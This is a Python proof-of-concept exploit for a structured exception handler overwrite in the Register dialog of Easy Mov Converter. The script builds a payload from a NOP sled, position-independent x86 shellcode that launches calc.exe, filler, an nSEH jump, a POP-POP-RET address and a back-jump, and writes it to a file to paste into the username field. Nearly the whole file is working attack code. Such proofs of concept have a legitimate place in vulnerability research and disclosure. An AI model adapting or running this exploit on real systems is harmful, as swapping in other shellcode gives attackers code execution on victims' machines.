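import os
import struct

# Easy Mov Converter - SEH overwrite proof of concept ("Register" dialog).
#
# Run this script and the payload is written to POCPayload.txt in the current
# directory. Open that file in Notepad and paste its contents into the
# username field of the Register function.
#
# NOTE(review): the payload is raw binary, not ASCII (0x90, 0xEB, 0xFF, ...).
# Whether every byte survives a Notepad copy/paste depends on the code page the
# clipboard and the application use. Confirm in a debugger that the bytes
# arrive unmodified before blaming the offsets below.
#
# The script is written to run under both Python 2.6+ and Python 3: all
# payload fragments are bytes literals, so the "wb" write below does not raise
# TypeError on Python 3 as the original str-based version did.

# Stage 0: 62-byte NOP sled, `jmp short +8`, then a 32-byte landing pad.
# The final back-jump (jmpbuf) lands in the 62-byte sled, slides into the
# short jump, and the landing pad runs straight into the shellcode.
buf = 62 * b"\x90" + b"\xeb\x08" + 32 * b"\x90"

# Filler between the shellcode and the SEH record.
buf2 = 697 * b"\x41"

# POP; POP; RET candidates noted by the author (all in the 0x1000xxxx module).
# Only the first is used; the rest are kept for retargeting another build.
# Nothing in this file shows whether that module is SafeSEH- and ASLR-free -
# verify that with the debugger (e.g. mona's SEH search) on the target host.
#   0x1002CCAF
#   0x1002CE91
#   0x1002CF71
#   0x10011D8B
#   0x100143A5
#   0x10014530
seh = b"\xaf\xcc\x02\x10"          # SE handler: POP; POP; RET (little-endian)
jmpshort = b"\x90\x90\xeb\x08"     # nSEH: NOP; NOP; JMP SHORT +8
jmpbuf = b"\xE9\x27\xFC\xFF\xFF"   # JMP rel32 (-985) back into the NOP sled

# Position-independent x86 shellcode. It reads the PEB via fs:[0x30], walks the
# loader module list (which module it lands on depends on the OS's load order;
# presumably kernel32) and parses the export table to resolve functions by
# name. The pushed strings decode to "WinExec" / "calc.exe" and "ExitProcess":
# it pops calc.exe and then exits the process cleanly. It contains no 0x00
# bytes, so it survives being treated as a C string.
shellcode = (
    b"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
    b"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
    b"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
    b"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
    b"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
    b"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
    b"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
    b"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
    b"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
    b"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
    b"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
    b"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
    b"\x52\xff\xd0"
)


def build_payload():
    """Assemble the SEH-overwrite payload and return it as bytes.

    Layout (byte offsets into the returned buffer, as the lengths above give
    them; whether 988 really is the nSEH offset in the target is the PoC
    author's claim and must be confirmed in the debugger):

        0     buf        NOP sled / jmp short / landing pad (96 bytes)
        96    shellcode  195 bytes
        291   buf2       697 bytes of filler up to the SEH record
        988   jmpshort   nSEH
        992   seh        handler address (POP; POP; RET)
        996   13 NOPs
        1009  jmpbuf     JMP rel32 back into the sled (lands at offset 29)

    Returns:
        The complete payload as bytes (1014 bytes with the constants above).

    Raises:
        ValueError: if the hard-coded rel32 in ``jmpbuf`` no longer lands in
            the leading NOP sled (someone changed a length without
            recomputing the jump), or if the payload contains a NUL byte,
            which a C-string username field would truncate on.
    """
    payload = buf + shellcode + buf2 + jmpshort + seh + 13 * b"\x90" + jmpbuf

    # Target of a JMP rel32 is the address *after* the 5-byte instruction
    # plus the signed displacement.
    jmp_at = len(payload) - len(jmpbuf)
    (rel32,) = struct.unpack("<i", jmpbuf[1:])
    target = jmp_at + len(jmpbuf) + rel32
    sled_len = buf.index(b"\xeb\x08")  # length of the leading NOP sled
    if not 0 <= target < sled_len:
        raise ValueError(
            "jmpbuf lands at offset %d, outside the %d-byte NOP sled; "
            "recompute the rel32 after changing buffer lengths" % (target, sled_len)
        )

    # The username field is presumably handled as a C string; a NUL would
    # truncate the payload before the SEH record is reached.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte at offset %d" % payload.index(b"\x00"))

    return payload


def main():
    """Write the payload to POCPayload.txt in the current directory."""
    with open("POCPayload.txt", "wb") as out:
        out.write(build_payload())


if __name__ == "__main__":
    main()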